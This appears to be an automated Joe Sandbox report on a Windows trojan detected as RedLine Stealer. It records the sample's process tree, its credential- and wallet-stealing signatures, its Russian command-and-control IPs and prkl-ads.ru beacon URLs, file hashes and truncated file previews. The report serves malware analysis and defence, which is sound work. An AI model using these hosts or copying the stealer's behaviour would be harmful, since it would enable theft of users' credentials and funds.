                  Behavior Graph ID: 1294691  Sample: SecuriteInfo.com.Win32.Troj...  Startdate: 21/08/2023  Architecture: WINDOWS  Score: 52

                  Signatures on the root node:
                  • Snort IDS alert for network traffic
                  • Multi AV Scanner detection for submitted file
                  • Yara detected RedLine Stealer
                  • 2 other signatures

                  Process tree (dropped files, network endpoints and signatures listed under the process they belong to):

                  msiexec.exe (15 35) - started
                    dropped: C:\Windows\Installer\446fc6.msi, Composite
                    dropped: C:\Windows\Installer\MSI76F0.tmp, PE32
                    dropped: C:\Windows\Installer\MSI750A.tmp, PE32
                    dropped: 5 other files (none is malicious)
                    msiexec.exe (9) - started
                      dropped: C:\Users\user\AppData\Local\...\scr77D6.ps1, Unicode
                      dropped: C:\Users\user\AppData\Local\...\pss77D9.ps1, Unicode
                      powershell.exe (15 18) - started
                        network: 45.135.232.24, ports 49735, 49736, 49737, ASBAXETNRU, Russian Federation
                        network: prkl-ads.ru 81.177.140.69, ports 443, 49723, 49724, RTCOMM-ASRU, Russian Federation
                        signature: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                        signature: Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                        signature: Tries to harvest and steal browser information (history, passwords, etc)
                        signature: Tries to steal Crypto Currency Wallets
                        conhost.exe - started
                    msiexec.exe - started
                      signature: Bypasses PowerShell execution policy

                  SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe (22) - started
                    dropped: C:\Users\user\AppData\Roaming\...\Helper.msi, Composite
                    dropped: C:\Users\user\AppData\Local\...\shi69FA.tmp, PE32+
                    dropped: C:\Users\user\AppData\Local\...\MSI6AF5.tmp, PE32
                    msiexec.exe (2) - started

                  Source | Detection | Scanner | Label | Link
                  SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | 13% | ReversingLabs | |
                  SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | 11% | Virustotal | | Browse

                  Source | Detection | Scanner | Label | Link
                  C:\Users\user\AppData\Local\Temp\MSI6AF5.tmp | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\shi69FA.tmp | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Roaming\Helper Company LLC\Helper\7z2201-x64.exe | 0% | ReversingLabs | |
                  C:\Windows\Installer\MSI7331.tmp | 0% | ReversingLabs | |
                  C:\Windows\Installer\MSI73EE.tmp | 0% | ReversingLabs | |
                  C:\Windows\Installer\MSI745C.tmp | 0% | ReversingLabs | |
                  C:\Windows\Installer\MSI74BB.tmp | 0% | ReversingLabs | |
                  C:\Windows\Installer\MSI750A.tmp | 0% | ReversingLabs | |
                  C:\Windows\Installer\MSI76F0.tmp | 0% | ReversingLabs | |
                  No Antivirus matches
                  No Antivirus matches
                  Name | IP | Active | Malicious | Antivirus Detection | Reputation
                  prkl-ads.ru | 81.177.140.69 | true | false | | unknown

                  Name | Malicious | Antivirus Detection | Reputation
                  https://prkl-ads.ru/?status=reg&key=llks74638sj&site=Test | false | Avira URL Cloud: safe | unknown
                  https://prkl-ads.ru/?status=start&av=Windows%20Defender | false | Avira URL Cloud: safe | unknown
                  https://prkl-ads.ru/?status=install | false | Avira URL Cloud: safe | unknown
                                                                                                          unknown
                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuepowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/Completionpowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://www.advancedinstaller.comSecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI750A.tmp.1.dr, MSI74BB.tmp.1.dr, MSI7331.tmp.1.dr, MSI6AF5.tmp.0.drfalse
                                                                                                                high
                                                                                                                http://schemas.xmlsoap.org/ws/2004/04/trustpowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponsepowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancelpowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://crls.ssl.coSecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.drfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/Noncepowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://tempuri.org/Contract/MSValue2ResponseDpowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnspowershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://html4/loose.dtdSecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.392305462.0000000005953000.00000004.00000020.00020000.00000000.sdmp, shi69FA.tmp.0.drfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          low
                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/Renewpowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKeypowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDpowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTpowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://schemas.xmlsoap.org/ws/2006/02/addressingidentitypowershell.exe, 00000005.00000002.523653859.0000000004FA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://contoso.com/Licensepowershell.exe, 00000005.00000002.528616904.0000000005B06000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://schemas.xmlsoap.org/soap/envelope/powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://ocsps.ssl.com0SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKeypowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://tempuri.org/Contract/MSValue1powershell.exe, 00000005.00000002.523653859.0000000004FA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004FAD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://prkl-ads.rupowershell.exe, 00000005.00000002.523653859.0000000004BD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            http://schemas.datacontract.org/2004/07/System.Xmlpowershell.exe, 00000005.00000002.559613303.0000000068728000.00000020.00000001.01000000.0000001A.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trustpowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://tempuri.org/Contract/MSValue2powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004FAD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              http://tempuri.org/Contract/MSValue3powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004FAD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://prkl-ads.ru?status=reg&key=llks74638sj&site=Testpowershell.exe, 00000005.00000002.523653859.0000000004BD9000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.drfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              http://.cssSecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.392305462.0000000005953000.00000004.00000020.00020000.00000000.sdmp, shi69FA.tmp.0.drfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              low
                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollbackpowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTpowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://tempuri.org/Dpowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/06/addressingexpowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wscoorpowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://ac.ecLRpowershell.exe, 00000005.00000003.507468238.000000000509A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.00000000051FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.000000000514C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      unknown
IP | Domain | Country | ASN | ASN Name | Malicious
81.177.140.69 | prkl-ads.ru | Russian Federation | 8342 | RTCOMM-ASRU | false
45.135.232.24 | unknown | Russian Federation | 49392 | ASBAXETNRU | true
Joe Sandbox Version: 38.0.0 Beryl
Analysis ID: 1294691
Start date and time: 2023-08-21 19:34:08 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 14m 13s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 22
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
Detection: MAL
Classification: mal52.troj.spyw.evad.winEXE@11/38@2/2
EGA Information:
• Successful, ratio: 100%
HDC Information: Failed
HCA Information:
• Successful, ratio: 64%
• Number of executed functions: 162
• Number of non-executed functions: 125
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240s for rundll32
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 20.209.48.97
• Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, client.wns.windows.com, metacookie25c19ec61c.blob.core.windows.net, eudb.ris.api.iris.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, g.bing.com, arc.msn.com, blob.ams08prdstr10a.store.core.windows.net
• Not all processes were analyzed; the report is missing behavior information.
• Report creation exceeded the maximum time and may be missing disassembly code information.
• Report size exceeded the maximum capacity and may be missing behavior information.
• Report size getting too big: too many NtOpenKeyEx calls found.
• Report size getting too big: too many NtProtectVirtualMemory calls found.
• Report size getting too big: too many NtQueryValueKey calls found.
Time | Type | Description
19:35:19 | API Interceptor | 292x Sleep call for process: powershell.exe modified
Match: 81.177.140.69
Associated Sample Name / URL | Detection | Threat Name | Context
scrFE4.ps1 | malicious | Unknown | -

No context
Match: RTCOMM-ASRU
Associated Sample Name / URL | Detection | Threat Name | Context
41O3Ng20n4.elf | malicious | Mirai | 81.177.17.84
scrFE4.ps1 | malicious | Unknown | 81.177.140.69
frank_v4.ps1 | malicious | RedLine | 81.177.140.194
rOtpAxzBT7.elf | malicious | Mirai | 213.59.13.180
sora.arm.elf | malicious | Mirai | 81.176.232.244
l2UQPm9o6q.elf | malicious | Mirai | 81.177.17.33
https://9sta9rt4.store/?status=reg&key=19.06_ow2hgf&site=Notion | malicious | Unknown | 81.177.140.194
SECT_v4.ps1 | malicious | Unknown | 195.161.114.3
dImXBB5Rd4.elf | malicious | Unknown | 213.24.4.242
96WwSFtZrw.exe | malicious | FormBook, GuLoader | 195.161.41.198
armv5l-20230712-1356.elf | malicious | Mirai | 81.176.255.15
x86-20230712-1356.elf | malicious | Mirai | 81.176.255.40
sora.arm.elf | malicious | Mirai | 81.177.17.99
PXPz45kM78.elf | malicious | Mirai | 81.176.231.60
MoEwyGqNDT.elf | malicious | Unknown | 81.177.42.10
pformbook.exe | malicious | FormBook | 195.161.62.100
y0uWRexXtw.exe | malicious | FormBook, PrivateLoader | 195.161.62.100
202385_dated_20.06.2023_-_#U0421PS_Grupp,_LLC.xls | malicious | FormBook | 195.161.62.100
SecuriteInfo.com.Gen.Variant.Nemesis.22803.4515.12611.exe | malicious | FormBook | 195.161.62.100
8BOpwaR3lt.exe | malicious | RedLine | 81.177.143.184
Match: 54328bd36c14bd82ddaa0c04b25ed9ad
Associated Sample Name / URL | Detection | Threat Name | Context
vn.cmd | malicious | Unknown | 81.177.140.69
yTj0n5qu.posh.ps1 | malicious | Unknown | 81.177.140.69
fa6af7e23ad1d78e2fa4ed2d372a0990a78bcc3a49bbd.exe | malicious | LimeRAT | 81.177.140.69
SCV.vbs | malicious | AgentTesla | 81.177.140.69
Photo_Image_Store-MnZ8RD7ic7oBUDadT3RD-22100-17668.bat | malicious | Unknown | 81.177.140.69
ZI5Fu2nDVe.exe | malicious | Unknown | 81.177.140.69
EHJ.vbs | malicious | AgentTesla | 81.177.140.69
DHL_AWB_2506307661.exe | malicious | FormBook | 81.177.140.69
qasx(1).vbs | malicious | Unknown | 81.177.140.69
HVS.vbs | malicious | Unknown | 81.177.140.69
#U0395#U03bd#U03c4#U03bf#U03bb#U03ae_#U03b1#U03b3#U03bf#U03c1#U03ac#U03c2.hta | malicious | AgentTesla | 81.177.140.69
Notice_4331860.js | malicious | Unknown | 81.177.140.69
Notice_5595225.js | malicious | Unknown | 81.177.140.69
lnvoice_#72993_pdf.vbs | malicious | Unknown | 81.177.140.69
Informe_Detallado_Reporte_Centrales_2023_08_015_PDF.vbs | malicious | Njrat | 81.177.140.69
Invoice_ID.lnk | malicious | Unknown | 81.177.140.69
file.js | malicious | Unknown | 81.177.140.69
decode_6fda918c8a7ba6982a7080a5eff5f97ec6ec50bea55936e98179f3683aa2c6e5.exe | malicious | AsyncRAT, DcRat | 81.177.140.69
decode_da721f195f41b72d8f2813eaa2c8388786bf5dffe6cbf59633a61a45576273f6.exe | malicious | AsyncRAT, DcRat | 81.177.140.69
EGK.vbs | malicious | AgentTesla | 81.177.140.69
Match: C:\Users\user\AppData\Local\Temp\MSI6AF5.tmp
Associated Sample Name / URL | Detection | Threat Name | Context
NotaFiscal.msi | malicious | Unknown | -
radarinstaller.exe | malicious | Unknown | -
radarinstaller.exe | malicious | Unknown | -
Danfe2372342.msi | malicious | Unknown | -
Danfe2372342.msi | malicious | Unknown | -
id-Processo_Z5TGVQUK.msi | malicious | Unknown | -
id-Processo_Z5TGVQUK.msi | malicious | Unknown | -

                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:modified
                                                                                                                                                                      Size (bytes):1674
                                                                                                                                                                      Entropy (8bit):5.717485601585273
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:dY1TmrWEz6BTmsFTmTx4FTmyTmIJbTmhdPYjED8SMiTm+O:dY1Tc4BTdTG4FTXTB9TudQY7TXO
                                                                                                                                                                      MD5:68AE2D79C50D2BD6B846C7A6C558BE23
                                                                                                                                                                      SHA1:C3D36F85DBB7FD3928AE09CD547B386809FEF8A3
                                                                                                                                                                      SHA-256:7F25FB3745DFA0715A9B4DAB58B818464DA65B691A73CC81B3660DC7D2FF5524
                                                                                                                                                                      SHA-512:8781D2D926E2EB15008F3970A38824E6435914267EFFF1E832BD868DF70B90D664C21BADB212FC85FB3FE71AC439FA9736AAB5A99CAC987EEE27F1A33FD3C29E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8003
                                                                                                                                                                      Entropy (8bit):4.839308921501875
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:yxoe5oVsm5emdVVFn3eGOVpN6K3bkkjo59gkjDt4iWN3yBGHh9smidcU6CXpOTik:DBVoGIpN6KQkj2Wkjh4iUx0mib4J
                                                                                                                                                                      MD5:937C6E940577634844311E349BD4614D
                                                                                                                                                                      SHA1:379440E933201CD3E6E6BF9B0E61B7663693195F
                                                                                                                                                                      SHA-256:30DC628AB2979D2CF0D281E998077E5721C68B9BBA61610039E11FDC438B993C
                                                                                                                                                                      SHA-512:6B37FE533991631C8290A0E9CC0B4F11A79828616BEF0233B4C57EC7C9DCBFC274FB7E50FC920C4312C93E74CE621B6779F10E4016E9FD794961696074BDFBFA
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):11072
                                                                                                                                                                      Entropy (8bit):5.899528789162663
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:NzIlyzk340DZ2fdwiyY/M31Gb6icdR9nGJUGXXyf8ORRBqk7L/l:NzIlyo34+AbyUM3D9R9GJUsCfF/B/Tl
                                                                                                                                                                      MD5:51212ED4732EC0863930F54E8F615280
                                                                                                                                                                      SHA1:9510B160C1E2627B162C691B44BDE95CFE8FD1E3
                                                                                                                                                                      SHA-256:125D3A382145CC00E87D480CF93EA3603C9E9F5BC83B7833B5DD5B26E22051F8
                                                                                                                                                                      SHA-512:FA7DE7B014BC4E278216A1405D07BEB1CB2046DD6B276EE1DFBC79A85E25B2902896118F26D9F626D9F0E44CFB6BC1C9CB3BC006ED955A7A17DFF697032D7981
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):570784
                                                                                                                                                                      Entropy (8bit):6.450187144191945
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:X+Sud3L4YgAc8wjVMeKRtGnm3CCRloVywX9gDAOAVafv5kh4JQCmR+gj:X+SuPgAc8+MjGCCslegDiwX5vOCmR+gj
                                                                                                                                                                      MD5:DB7612F0FD6408D664185CFC81BEF0CB
                                                                                                                                                                      SHA1:19A6334EC00365B4F4E57D387ED885B32AA7C9AA
                                                                                                                                                                      SHA-256:E9E426B679B3EFB233F03C696E997E2DA3402F16A321E954B54454317FCEB240
                                                                                                                                                                      SHA-512:25E129CB22AAABC68C42ECF10BB650AC4D0609B12C08703C780572BAC7ECF4559FCC49CD595C56EA48CF55260A984CFA333C08307FFB7C62268B03FBECC724B9
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                      • Filename: NotaFiscal.msi, Detection: malicious
                                                                                                                                                                      • Filename: radarinstaller.exe, Detection: malicious
                                                                                                                                                                      • Filename: radarinstaller.exe, Detection: malicious
                                                                                                                                                                      • Filename: Danfe2372342.msi, Detection: malicious
                                                                                                                                                                      • Filename: Danfe2372342.msi, Detection: malicious
                                                                                                                                                                      • Filename: id-Processo_Z5TGVQUK.msi, Detection: malicious
                                                                                                                                                                      • Filename: id-Processo_Z5TGVQUK.msi, Detection: malicious
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&r.gb..4b..4b..4.a.5o..4.a.5...4-o.5s..4-o.5z..4-o.5(..4.a.5{..4.a.5c..4.a.5E..4b..4...4.o.5...4.o.5c..4.ou4c..4b..4c..4.o.5c..4Richb..4................PE..L...f.c.........."!..."............................................................q.....@.....................................,....`...................#...p...b..8Y..p....................Y......xX..@...............<............................text...6........................... ..`.rdata..X...........................@..@.data...."...0......................@....rsrc........`.......&..............@..@.reloc...b...p...d..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1500
                                                                                                                                                                      Entropy (8bit):4.229107273934832
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:m53r/bG/Q8SMgu5Yl6ux+3wa53r/bG/Q1+Mgu5Yl/ax+3v:wTy/QuglllwAMTy/Q1Tgll/awf
                                                                                                                                                                      MD5:511C85632F2481E3224EB4316387BBEB
                                                                                                                                                                      SHA1:DC05BF165B266D07AA51F6FDBCE2BBD5DC4EB9D2
                                                                                                                                                                      SHA-256:514D22DB04F1C9309F078D9345B12AD2BCA09D4EC7BFE7ADAB13B34157D3EF28
                                                                                                                                                                      SHA-512:0D5BB2F0DB781D4773B247CB4E25D121AD63D6CA37E999DE0A49C715A6C284E99898E8667ABF45C3EC31D115EBB3CF838133F1202A4F9E3E65700E2F982BE9AB
                                                                                                                                                                      Malicious:false
Preview (CRLF line breaks restored; the file is the formatted HtmlWebResponseObject that Invoke-WebRequest returns, written out twice, one per request; the preview is truncated):

StatusCode : 200
StatusDescription : OK
Content :
RawContent : HTTP/1.1 200 OK
 Connection: close
 Content-Length: 0
 Content-Type: text/html; charset=UTF-8
 Date: Mon, 21 Aug 2023 17:35:21 GMT
 Server: Apache/2.4.6 (CentOS) PHP/7.4.33
 X-Powered-By: PHP/7.4.33

Forms :
Headers : {[Connection, close], [Content-Length, 0], [Content-Type, text/html; charset=UTF-8], [Date, Mon,
 21 Aug 2023 17:35:21 GMT]...}
Images : {}
InputFields : {}
Links : {}
ParsedHtml :
RawContentLength : 0

StatusCode : 200
StatusDescription : OK
Content :
RawContent : HTTP/1.1 200 OK
 Connection: close
 Content-Length: 0
 Content-Type: text/html; charset=UTF-8
(preview truncated)
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:1
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:1
                                                                                                                                                                      Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):6668
                                                                                                                                                                      Entropy (8bit):3.5127462716425657
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:5Wb5VNkKmeHn/V2BVrIovmgNlGjxcj6BngOcvjb:5WbyZ/gVyvb
                                                                                                                                                                      MD5:30C30EF2CB47E35101D13402B5661179
                                                                                                                                                                      SHA1:25696B2AAB86A9233F19017539E2DD83B2F75D4E
                                                                                                                                                                      SHA-256:53094DF6FA4E57A3265FF04BC1E970C10BCDB3D4094AD6DD610C05B7A8B79E0F
                                                                                                                                                                      SHA-512:882BE2768138BB75FF7DDE7D5CA4C2E024699398BAACD0CE1D4619902402E054297E4F464D8CB3C22B2F35D3DABC408122C207FACAD64EC8014F2C54834CF458
                                                                                                                                                                      Malicious:true
Preview (decoded from UTF-16LE with BOM, CRLF restored; this is the launcher script's param block, and the on-disk file continues past this point):

param(
  [alias("propFile")]      [Parameter(Mandatory=$true)] [string] $msiPropOutFilePath
 ,[alias("propSep")]       [Parameter(Mandatory=$true)] [string] $msiPropKVSeparator
 ,[alias("lineSep")]       [Parameter(Mandatory=$true)] [string] $msiPropLineSeparator
 ,[alias("scriptFile")]    [Parameter(Mandatory=$true)] [string] $userScriptFilePath
 ,[alias("scriptArgsFile")][Parameter(Mandatory=$false)][string] $userScriptArgsFilePath
 ,[Parameter(Mandatory=$true)] (preview truncated)
                                                                                                                                                                      Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1854
                                                                                                                                                                      Entropy (8bit):3.7148687475785183
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:zB3tAnN1sAT1X1t+nWi2JgJ/yFTqDkagcv:V9AHsEX1tsWtJgkq9gcv
                                                                                                                                                                      MD5:FEEA20931D1BB33EFE4B4FEA34A34007
                                                                                                                                                                      SHA1:A77160427861E12AC9D860E40B3126E6C7F1AD9B
                                                                                                                                                                      SHA-256:BCD9751A982C594D84C8EDBDF4CB9E9DF6B12E4E20528074CECC1453881A1314
